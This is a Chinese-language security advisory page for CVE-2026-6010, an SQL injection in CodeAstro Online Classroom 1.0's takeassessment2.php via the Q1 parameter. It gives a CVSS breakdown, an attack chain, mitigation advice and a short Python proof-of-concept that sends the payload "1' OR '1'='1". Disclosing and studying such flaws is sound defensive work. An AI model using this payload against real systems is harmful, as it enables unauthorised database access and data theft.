CVE-2026-6010 CVSS 6.3 中危

CVE-2026-6010 CodeAstro Online Classroom SQL注入漏洞

披露日期: 2026-04-10

来源: [email protected]

漏洞信息

漏洞编号

CVE-2026-6010

漏洞类型

SQL注入

CVSS评分

6.3 中危

攻击向量

网络 (AV:N)

认证要求

低权限 (PR:L)

用户交互

无需交互 (UI:N)

影响产品

CodeAstro Online Classroom 1.0

漏洞概述

CodeAstro Online Classroom 1.0版本的/OnlineClassroom/takeassessment2.php文件存在SQL注入漏洞。攻击者可操纵参数Q1，无需用户交互即可远程利用该漏洞，可能导致敏感信息泄露或数据库被篡改。

技术细节

该漏洞的根本原因在于CodeAstro Online Classroom 1.0未能对用户输入进行充分的安全过滤。具体而言，在/OnlineClassroom/takeassessment2.php文件中，应用程序直接将用户通过POST或GET方式提交的Q1参数拼接到SQL查询语句中执行。攻击者可以构造包含恶意SQL语法的数据包，使得数据库执行非预期的命令。根据CVSS 3.1向量分析，该漏洞攻击复杂度低（AC:L），无需用户交互（UI:N），且攻击范围未改变（S:U），但会影响机密性、完整性和可用性（均为低影响）。由于需要低权限（PR:L），攻击者可能需要先获取基础账户权限才能发起攻击。

攻击链分析

STEP 1

侦察

攻击者识别出目标正在运行CodeAstro Online Classroom 1.0，并定位到存在漏洞的文件/OnlineClassroom/takeassessment2.php。

STEP 2

获取访问权限

攻击者获取目标系统的低权限账户（根据CVSS PR:L要求），以便能够访问评估功能。

STEP 3

漏洞利用

攻击者向目标URL发送特制的HTTP请求，在Q1参数中注入恶意SQL代码（如UNION SELECT或布尔盲注语句）。

STEP 4

数据窃取或篡改

数据库执行恶意SQL语句，返回敏感数据（如用户名、密码哈希）或修改现有数据，导致机密性和完整性受损。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

import requests

def verify_sqli(target_url):
    """
    Proof of Concept for CVE-2026-6010
    """
    # The vulnerable endpoint and parameter based on description
    url = f"{target_url}/OnlineClassroom/takeassessment2.php?exid=14"
    
    # Simple SQL Injection payload to test vulnerability
    # Using a single quote to break the query syntax
    payload_data = {
        "Q1": "1' OR '1'='1"
    }

    try:
        response = requests.post(url, data=payload_data, timeout=10)
        
        # Analyze response to check for SQL errors or successful logic bypass
        if response.status_code == 200:
            print("[+] Request sent successfully.")
            # Example logic: check for SQL syntax error in response body
            if "error" in response.text.lower() or "syntax" in response.text.lower():
                print("[+] Potential SQL Injection vulnerability detected (SQL Error found).")
            else:
                print("[+] Request executed. Check manual response for data leakage.")
            print(f"[+] Response snippet: {response.text[:200]}")
        else:
            print(f"[-] Unexpected status code: {response.status_code}")
            
    except requests.exceptions.RequestException as e:
        print(f"[-] Connection error: {e}")

if __name__ == "__main__":
    # Replace with actual target IP or domain
    target = "http://127.0.0.1"
    verify_sqli(target)

影响范围

CodeAstro Online Classroom 1.0

防御指南

临时缓解措施

在未升级修复前，建议部署Web应用防火墙（WAF）以拦截针对takeassessment2.php的恶意SQL注入请求，并临时限制对该页面的外部访问。

参考链接

1 CVE https://www.cve.org/CVERecord?id=CVE-2026-6010
2 NVD https://nvd.nist.gov/vuln/detail/CVE-2026-6010
3 Details https://www.cvedetails.com/cve/CVE-2026-6010/
4 VulDB https://vuldb.com/cve/CVE-2026-6010
5 Link https://codeastro.com/
6 Link https://github.com/xue-p123/vuldb-research/issues/2
7 Link https://vuldb.com/submit/794658
8 Link https://vuldb.com/vuln/356566
9 Link https://vuldb.com/vuln/356566/cti

快速导航: 前沿安全最新收录域名列表最新威胁情报列表最新网站排名列表最新工具资源列表最新CVE漏洞列表